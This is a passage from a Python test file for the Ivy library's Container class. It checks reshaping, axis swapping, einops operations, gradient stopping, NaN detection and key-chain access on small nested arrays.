assert np.allclose(ivy.to_numpy(container_swapped['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['d']), np.array([[10.], [9.], [8.], [7.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.d), np.array([[10.], [9.], [8.], [7.]]))
# with key_chains to apply
container_swapped = container.swapaxes(0, 1, ['a', 'b/c'])
assert np.allclose(ivy.to_numpy(container_swapped['a']), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped.a), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['d']), np.array([10., 9., 8., 7.]))
assert np.allclose(ivy.to_numpy(container_swapped.b.d), np.array([10., 9., 8., 7.]))
# with key_chains to apply pruned
container_swapped = container.swapaxes(0, 1, ['a', 'b/c'], prune_unapplied=True)
assert np.allclose(ivy.to_numpy(container_swapped['a']), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped.a), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert 'b/d' not in container_swapped
# with key_chains to not apply
container_swapped = container.swapaxes(0, 1, Container({'a': None, 'b': {'d': None}}), to_apply=False)
assert np.allclose(ivy.to_numpy(container_swapped['a']), np.array([0., 1., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_swapped.a), np.array([0., 1., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped['b']['d']), np.array([10., 9., 8., 7.]))
assert np.allclose(ivy.to_numpy(container_swapped.b.d), np.array([10., 9., 8., 7.]))
# with key_chains to not apply pruned
container_swapped = container.swapaxes(0, 1, Container({'a': None, 'b': {'d': None}}), to_apply=False,
prune_unapplied=True)
assert 'a' not in container_swapped
assert np.allclose(ivy.to_numpy(container_swapped['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_swapped.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert 'b/d' not in container_swapped
def test_container_reshape(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
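    # the target shape for each leaf appears to be composed as
    # pre_shape + leaf_shape[shape_slice] + post_shape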
# pre_shape only
container_reshaped = container.reshape((1, 2, 2))
assert np.allclose(ivy.to_numpy(container_reshaped['a']), np.array([[0., 1.], [2., 3.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.a), np.array([[0., 1.], [2., 3.]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['c']), np.array([[5., 10.], [15., 20.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.c), np.array([[5., 10.], [15., 20.]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['d']), np.array([[10., 9.], [8., 7.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.d), np.array([[10., 9.], [8., 7.]]))
# pre_shape and slice
dict_in = {'a': ivy.array([[[0., 1., 2., 3.], [0., 1., 2., 3.]]], dev=dev),
'b': {'c': ivy.array([[[5., 10., 15.], [20., 25., 30.]]], dev=dev),
'd': ivy.array([[[10.], [9.]]], dev=dev)}}
container = Container(dict_in)
container_reshaped = container.reshape((-1,), slice(2, None))
assert np.allclose(ivy.to_numpy(container_reshaped['a']), np.array([[0., 1., 2., 3.], [0., 1., 2., 3.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.a), np.array([[0., 1., 2., 3.], [0., 1., 2., 3.]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['c']), np.array([[5., 10., 15.], [20., 25., 30.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.c), np.array([[5., 10., 15.], [20., 25., 30.]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['d']), np.array([[10.], [9.]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.d), np.array([[10.], [9.]]))
# pre_shape, slice and post_shape
dict_in = {'a': ivy.array([[[0., 1., 2., 3.], [0., 1., 2., 3.]]], dev=dev),
'b': {'c': ivy.array([[[5., 10., 15.], [20., 25., 30.]]], dev=dev),
'd': ivy.array([[[10.], [9.]]], dev=dev)}}
container = Container(dict_in)
container_reshaped = container.reshape((-1,), slice(2, None), (1,))
assert np.allclose(ivy.to_numpy(container_reshaped['a']), np.array([[[0.], [1.], [2.], [3.]],
[[0.], [1.], [2.], [3.]]]))
assert np.allclose(ivy.to_numpy(container_reshaped.a), np.array([[[0.], [1.], [2.], [3.]],
[[0.], [1.], [2.], [3.]]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['c']), np.array([[[5.], [10.], [15.]],
[[20.], [25.], [30.]]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.c), np.array([[[5.], [10.], [15.]],
[[20.], [25.], [30.]]]))
assert np.allclose(ivy.to_numpy(container_reshaped['b']['d']), np.array([[[10.]], [[9.]]]))
assert np.allclose(ivy.to_numpy(container_reshaped.b.d), np.array([[[10.]], [[9.]]]))
def test_container_einops_rearrange(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
container_rearranged = container.einops_rearrange('b n -> n b')
assert np.allclose(ivy.to_numpy(container_rearranged['a']), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_rearranged.a), np.array([[0.], [1.], [2.], [3.]]))
assert np.allclose(ivy.to_numpy(container_rearranged['b']['c']), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_rearranged.b.c), np.array([[5.], [10.], [15.], [20.]]))
assert np.allclose(ivy.to_numpy(container_rearranged['b']['d']), np.array([[10.], [9.], [8.], [7.]]))
assert np.allclose(ivy.to_numpy(container_rearranged.b.d), np.array([[10.], [9.], [8.], [7.]]))
def test_container_einops_reduce(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
container_reduced = container.einops_reduce('b n -> b', 'mean')
assert np.allclose(ivy.to_numpy(container_reduced['a']), np.array([1.5]))
assert np.allclose(ivy.to_numpy(container_reduced.a), np.array([1.5]))
assert np.allclose(ivy.to_numpy(container_reduced['b']['c']), np.array([12.5]))
assert np.allclose(ivy.to_numpy(container_reduced.b.c), np.array([12.5]))
assert np.allclose(ivy.to_numpy(container_reduced['b']['d']), np.array([8.5]))
assert np.allclose(ivy.to_numpy(container_reduced.b.d), np.array([8.5]))
def test_container_einops_repeat(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
container_repeated = container.einops_repeat('b n -> b n c', c=2)
assert np.allclose(ivy.to_numpy(container_repeated['a']),
np.array([[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]]))
assert np.allclose(ivy.to_numpy(container_repeated.a),
np.array([[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']),
np.array([[[5., 5.], [10., 10.], [15., 15.], [20., 20.]]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c),
np.array([[[5., 5.], [10., 10.], [15., 15.], [20., 20.]]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['d']),
np.array([[[10., 10.], [9., 9.], [8., 8.], [7., 7.]]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.d),
np.array([[[10., 10.], [9., 9.], [8., 8.], [7., 7.]]]))
# def test_container_to_dev(dev, call):
# dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
# 'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
# 'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
# container = Container(dict_in)
#
# container_to_cpu = container.to_dev(dev)
# assert ivy.dev(container_to_cpu['a'], as_str=True) == dev
# assert ivy.dev(container_to_cpu.a, as_str=True) == dev
# assert ivy.dev(container_to_cpu['b']['c'], as_str=True) == dev
# assert ivy.dev(container_to_cpu.b.c, as_str=True) == dev
# assert ivy.dev(container_to_cpu['b']['d'], as_str=True) == dev
# assert ivy.dev(container_to_cpu.b.d, as_str=True) == dev
def test_container_stop_gradients(dev, call):
dict_in = {'a': ivy.variable(ivy.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]], dev=dev)),
'b': {'c': ivy.variable(ivy.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]], dev=dev)),
'd': ivy.variable(ivy.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]], dev=dev))}}
container = Container(dict_in)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container['a'])
assert ivy.is_variable(container.a)
assert ivy.is_variable(container['b']['c'])
assert ivy.is_variable(container.b.c)
assert ivy.is_variable(container['b']['d'])
assert ivy.is_variable(container.b.d)
# without key_chains specification
container_stopped_grads = container.stop_gradients()
assert ivy.is_array(container_stopped_grads['a'])
assert ivy.is_array(container_stopped_grads.a)
assert ivy.is_array(container_stopped_grads['b']['c'])
assert ivy.is_array(container_stopped_grads.b.c)
assert ivy.is_array(container_stopped_grads['b']['d'])
assert ivy.is_array(container_stopped_grads.b.d)
# with key_chains to apply
container_stopped_grads = container.stop_gradients(key_chains=['a', 'b/c'])
assert ivy.is_array(container_stopped_grads['a'])
assert ivy.is_array(container_stopped_grads.a)
assert ivy.is_array(container_stopped_grads['b']['c'])
assert ivy.is_array(container_stopped_grads.b.c)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads['b']['d'])
assert ivy.is_variable(container_stopped_grads.b.d)
# with key_chains to apply pruned
container_stopped_grads = container.stop_gradients(key_chains=['a', 'b/c'], prune_unapplied=True)
assert ivy.is_array(container_stopped_grads['a'])
assert ivy.is_array(container_stopped_grads.a)
assert ivy.is_array(container_stopped_grads['b']['c'])
assert ivy.is_array(container_stopped_grads.b.c)
assert 'b/d' not in container_stopped_grads
# with key_chains to not apply
container_stopped_grads = container.stop_gradients(key_chains=Container({'a': None, 'b': {'d': None}}),
to_apply=False)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads['a'])
assert ivy.is_variable(container_stopped_grads.a)
assert ivy.is_array(container_stopped_grads['b']['c'])
assert ivy.is_array(container_stopped_grads.b.c)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads['b']['d'])
assert ivy.is_variable(container_stopped_grads.b.d)
# with key_chains to not apply pruned
container_stopped_grads = container.stop_gradients(key_chains=Container({'a': None, 'b': {'d': None}}),
to_apply=False, prune_unapplied=True)
assert 'a' not in container_stopped_grads
assert ivy.is_array(container_stopped_grads['b']['c'])
assert ivy.is_array(container_stopped_grads.b.c)
assert 'b/d' not in container_stopped_grads
def test_container_as_variables(dev, call):
dict_in = {'a': ivy.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]], dev=dev),
'b': {'c': ivy.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]], dev=dev),
'd': ivy.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]], dev=dev)}}
container = Container(dict_in)
assert ivy.is_array(container['a'])
assert ivy.is_array(container.a)
assert ivy.is_array(container['b']['c'])
assert ivy.is_array(container.b.c)
assert ivy.is_array(container['b']['d'])
assert ivy.is_array(container.b.d)
variable_cont = container.as_variables()
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(variable_cont['a'])
assert ivy.is_variable(variable_cont.a)
assert ivy.is_variable(variable_cont['b']['c'])
assert ivy.is_variable(variable_cont.b.c)
assert ivy.is_variable(variable_cont['b']['d'])
assert ivy.is_variable(variable_cont.b.d)
def test_container_as_arrays(dev, call):
dict_in = {'a': ivy.variable(ivy.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]], dev=dev)),
'b': {'c': ivy.variable(ivy.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]], dev=dev)),
'd': ivy.variable(ivy.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]], dev=dev))}}
container = Container(dict_in)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container['a'])
assert ivy.is_variable(container.a)
assert ivy.is_variable(container['b']['c'])
assert ivy.is_variable(container.b.c)
assert ivy.is_variable(container['b']['d'])
assert ivy.is_variable(container.b.d)
# without key_chains specification
container_as_arrays = container.as_arrays()
assert ivy.is_array(container_as_arrays['a'])
assert ivy.is_array(container_as_arrays.a)
assert ivy.is_array(container_as_arrays['b']['c'])
assert ivy.is_array(container_as_arrays.b.c)
assert ivy.is_array(container_as_arrays['b']['d'])
assert ivy.is_array(container_as_arrays.b.d)
def test_container_num_arrays(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
assert container.num_arrays() == 3
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.variable(ivy.array([[5., 10., 15., 20.]], dev=dev)),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
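    # variables presumably only count as arrays for the numpy and jax
    # backends, where variables are represented as plain arrays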
    assert container.num_arrays() == (3 if call in [helpers.np_call, helpers.jnp_call] else 2)
def test_container_size_ordered_arrays(dev, call):
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10.]], dev=dev),
'd': ivy.array([[10., 9., 8.]], dev=dev)}}
container = Container(dict_in)
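    # keys are flattened with '__' separators and the leaves are returned in
    # ascending order of array size, as the values() check below verifies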
size_ordered = container.size_ordered_arrays()
assert np.allclose(ivy.to_numpy(size_ordered.a), np.array([[0., 1., 2., 3.]]))
assert np.allclose(ivy.to_numpy(size_ordered.b__c), np.array([[5., 10.]]))
assert np.allclose(ivy.to_numpy(size_ordered.b__d), np.array([[10., 9., 8.]]))
for v, arr in zip(size_ordered.values(), [np.array([[5., 10.]]),
np.array([[10., 9., 8.]]),
np.array([[0., 1., 2., 3.]])]):
assert np.allclose(ivy.to_numpy(v), arr)
def test_container_to_numpy(dev, call):
dict_in = {'a': ivy.variable(ivy.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]], dev=dev)),
'b': {'c': ivy.variable(ivy.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]], dev=dev)),
'd': ivy.variable(ivy.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]], dev=dev))}}
container = Container(dict_in)
# before conversion
assert ivy.is_array(container['a'])
assert ivy.is_array(container.a)
assert ivy.is_array(container['b']['c'])
assert ivy.is_array(container.b.c)
assert ivy.is_array(container['b']['d'])
assert ivy.is_array(container.b.d)
# after conversion
container_to_numpy = container.to_numpy()
assert isinstance(container_to_numpy['a'], np.ndarray)
assert isinstance(container_to_numpy.a, np.ndarray)
assert isinstance(container_to_numpy['b']['c'], np.ndarray)
assert isinstance(container_to_numpy.b.c, np.ndarray)
assert isinstance(container_to_numpy['b']['d'], np.ndarray)
assert isinstance(container_to_numpy.b.d, np.ndarray)
def test_container_from_numpy(dev, call):
dict_in = {'a': np.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]]),
'b': {'c': np.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]]),
'd': np.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]])}}
# before conversion
container = Container(dict_in)
assert isinstance(container['a'], np.ndarray)
assert isinstance(container.a, np.ndarray)
assert isinstance(container['b']['c'], np.ndarray)
assert isinstance(container.b.c, np.ndarray)
assert isinstance(container['b']['d'], np.ndarray)
assert isinstance(container.b.d, np.ndarray)
# after conversion
container_from_numpy = container.from_numpy()
assert ivy.is_array(container_from_numpy['a'])
assert ivy.is_array(container_from_numpy.a)
assert ivy.is_array(container_from_numpy['b']['c'])
assert ivy.is_array(container_from_numpy.b.c)
assert ivy.is_array(container_from_numpy['b']['d'])
assert ivy.is_array(container_from_numpy.b.d)
def test_container_arrays_as_lists(dev, call):
dict_in = {'a': ivy.array([[[1., 2.], [3., 4.]], [[5., 6.], [7., 8.]]], dev=dev),
'b': {'c': ivy.array([[[8., 7.], [6., 5.]], [[4., 3.], [2., 1.]]], dev=dev),
'd': ivy.array([[[2., 4.], [6., 8.]], [[10., 12.], [14., 16.]]], dev=dev)}}
container = Container(dict_in)
assert ivy.is_array(container['a'])
assert ivy.is_array(container.a)
assert ivy.is_array(container['b']['c'])
assert ivy.is_array(container.b.c)
assert ivy.is_array(container['b']['d'])
assert ivy.is_array(container.b.d)
# without key_chains specification
container_arrays_as_lists = container.arrays_as_lists()
assert isinstance(container_arrays_as_lists['a'], list)
assert isinstance(container_arrays_as_lists.a, list)
assert isinstance(container_arrays_as_lists['b']['c'], list)
assert isinstance(container_arrays_as_lists.b.c, list)
assert isinstance(container_arrays_as_lists['b']['d'], list)
assert isinstance(container_arrays_as_lists.b.d, list)
def test_container_has_key(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
assert container.has_key('a')
assert container.has_key('b')
assert container.has_key('c')
assert container.has_key('d')
assert not container.has_key('e')
assert not container.has_key('f')
def test_container_has_key_chain(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
assert container.has_key_chain('a')
assert container.has_key_chain('b')
assert container.has_key_chain('b/c')
assert container.has_key_chain('b/d')
assert not container.has_key_chain('b/e')
assert not container.has_key_chain('c')
def test_container_has_nans(dev, call):
container = Container({'a': ivy.array([1., 2.], dev=dev),
'b': {'c': ivy.array([2., 3.], dev=dev), 'd': ivy.array([3., 4.], dev=dev)}})
container_nan = Container({'a': ivy.array([1., 2.], dev=dev),
'b': {'c': ivy.array([float('nan'), 3.], dev=dev),
'd': ivy.array([3., 4.], dev=dev)}})
container_inf = Container({'a': ivy.array([1., 2.], dev=dev),
'b': {'c': ivy.array([2., 3.], dev=dev),
'd': ivy.array([3., float('inf')], dev=dev)}})
container_nan_n_inf = Container({'a': ivy.array([1., 2.], dev=dev),
'b': {'c': ivy.array([float('nan'), 3.], dev=dev),
'd': ivy.array([3., float('inf')], dev=dev)}})
# global
# with inf check
assert not container.has_nans()
assert container_nan.has_nans()
assert container_inf.has_nans()
assert container_nan_n_inf.has_nans()
# without inf check
assert not container.has_nans(include_infs=False)
assert container_nan.has_nans(include_infs=False)
assert not container_inf.has_nans(include_infs=False)
assert container_nan_n_inf.has_nans(include_infs=False)
# leafwise
# with inf check
container_hn = container.has_nans(leafwise=True)
assert container_hn.a is False
assert container_hn.b.c is False
assert container_hn.b.d is False
container_nan_hn = container_nan.has_nans(leafwise=True)
assert container_nan_hn.a is False
assert container_nan_hn.b.c is True
assert container_nan_hn.b.d is False
container_inf_hn = container_inf.has_nans(leafwise=True)
assert container_inf_hn.a is False
assert container_inf_hn.b.c is False
assert container_inf_hn.b.d is True
container_nan_n_inf_hn = container_nan_n_inf.has_nans(leafwise=True)
assert container_nan_n_inf_hn.a is False
assert container_nan_n_inf_hn.b.c is True
assert container_nan_n_inf_hn.b.d is True
# without inf check
container_hn = container.has_nans(leafwise=True, include_infs=False)
assert container_hn.a is False
assert container_hn.b.c is False
assert container_hn.b.d is False
container_nan_hn = container_nan.has_nans(leafwise=True, include_infs=False)
assert container_nan_hn.a is False
assert container_nan_hn.b.c is True
assert container_nan_hn.b.d is False
container_inf_hn = container_inf.has_nans(leafwise=True, include_infs=False)
assert container_inf_hn.a is False
assert container_inf_hn.b.c is False
assert container_inf_hn.b.d is False
container_nan_n_inf_hn = container_nan_n_inf.has_nans(leafwise=True, include_infs=False)
assert container_nan_n_inf_hn.a is False
assert container_nan_n_inf_hn.b.c is True
assert container_nan_n_inf_hn.b.d is False
def test_container_at_keys(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
new_container = container.at_keys(['a', 'c'])
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert 'd' not in new_container['b']
new_container = container.at_keys('c')
assert 'a' not in new_container
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert 'd' not in new_container['b']
new_container = container.at_keys(['b'])
assert 'a' not in new_container
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([3]))
def test_container_at_key_chain(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
# explicit function call
sub_container = container.at_key_chain('b')
assert np.allclose(ivy.to_numpy(sub_container['c']), np.array([2]))
sub_container = container.at_key_chain('b/c')
assert np.allclose(ivy.to_numpy(sub_container), np.array([2]))
# overridden built-in function call
sub_container = container['b']
assert np.allclose(ivy.to_numpy(sub_container['c']), np.array([2]))
sub_container = container['b/c']
assert np.allclose(ivy.to_numpy(sub_container), np.array([2]))
def test_container_at_key_chains(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
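    # the chains to keep can be specified as a nested Container (leaf values
    # just mark the selected chains), as a list, or as a single string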
target_cont = Container({'a': True, 'b': {'c': True}})
new_container = container.at_key_chains(target_cont)
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert 'd' not in new_container['b']
new_container = container.at_key_chains(['b/c', 'b/d'])
assert 'a' not in new_container
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([3]))
new_container = container.at_key_chains('b/c')
assert 'a' not in new_container
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert 'd' not in new_container['b']
@pytest.mark.parametrize(
"include_empty", [True, False])
def test_container_all_key_chains(include_empty, dev, call):
a_val = Container() if include_empty else ivy.array([1], dev=dev)
bc_val = Container() if include_empty else ivy.array([2], dev=dev)
bd_val = Container() if include_empty else ivy.array([3], dev=dev)
dict_in = {'a': a_val, 'b': {'c': bc_val, 'd': bd_val}}
container = Container(dict_in)
kcs = container.all_key_chains(include_empty)
assert kcs[0] == 'a'
assert kcs[1] == 'b/c'
assert kcs[2] == 'b/d'
@pytest.mark.parametrize(
"include_empty", [True, False])
def test_container_key_chains_containing(include_empty, dev, call):
a_val = Container() if include_empty else ivy.array([1], dev=dev)
bc_val = Container() if include_empty else ivy.array([2], dev=dev)
bd_val = Container() if include_empty else ivy.array([3], dev=dev)
dict_in = {'a_sub': a_val, 'b': {'c': bc_val, 'd_sub': bd_val}}
container = Container(dict_in)
kcs = container.key_chains_containing('sub', include_empty)
assert kcs[0] == 'a_sub'
assert kcs[1] == 'b/d_sub'
# noinspection PyUnresolvedReferences
def test_container_set_at_keys(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container_orig = Container(dict_in)
# explicit function call
orig_container = container_orig.copy()
container = orig_container.set_at_keys({'b': ivy.array([4], dev=dev)})
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']), np.array([4]))
assert not container.has_key('c')
assert not container.has_key('d')
container = orig_container.set_at_keys({'a': ivy.array([5], dev=dev), 'c': ivy.array([6], dev=dev)})
assert np.allclose(ivy.to_numpy(container['a']), np.array([5]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([6]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
# noinspection PyUnresolvedReferences
def test_container_set_at_key_chain(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container_orig = Container(dict_in)
# explicit function call
container = container_orig.copy()
container = container.set_at_key_chain('b/e', ivy.array([4], dev=dev))
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['e']), np.array([4]))
container = container.set_at_key_chain('f', ivy.array([5], dev=dev))
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['e']), np.array([4]))
assert np.allclose(ivy.to_numpy(container['f']), np.array([5]))
# overridden built-in function call
container = container_orig.copy()
assert 'b/e' not in container
container['b/e'] = ivy.array([4], dev=dev)
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['e']), np.array([4]))
assert 'f' not in container
container['f'] = ivy.array([5], dev=dev)
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['e']), np.array([4]))
assert np.allclose(ivy.to_numpy(container['f']), np.array([5]))
# noinspection PyUnresolvedReferences
def test_container_overwrite_at_key_chain(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container_orig = Container(dict_in)
# explicit function call
container = container_orig.copy()
# noinspection PyBroadException
try:
container.overwrite_at_key_chain('b/e', ivy.array([4], dev=dev))
exception_raised = False
except Exception:
exception_raised = True
assert exception_raised
container = container.overwrite_at_key_chain('b/d', ivy.array([4], dev=dev))
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([4]))
def test_container_set_at_key_chains(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
target_container = Container({'a': ivy.array([4], dev=dev),
'b': {'d': ivy.array([5], dev=dev)}})
new_container = container.set_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([4]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([5]))
target_container = Container({'b': {'c': ivy.array([7], dev=dev)}})
new_container = container.set_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([7]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([3]))
def test_container_overwrite_at_key_chains(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
target_container = Container({'a': ivy.array([4], dev=dev),
'b': {'d': ivy.array([5], dev=dev)}})
new_container = container.overwrite_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([4]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([5]))
target_container = Container({'b': {'c': ivy.array([7], dev=dev)}})
new_container = container.overwrite_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container['b']['c']), np.array([7]))
assert np.allclose(ivy.to_numpy(new_container['b']['d']), np.array([3]))
# noinspection PyBroadException
try:
container.overwrite_at_key_chains(Container({'b': {'e': ivy.array([5], dev=dev)}}))
exception_raised = False
except Exception:
exception_raised = True
assert exception_raised
def test_container_prune_keys(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
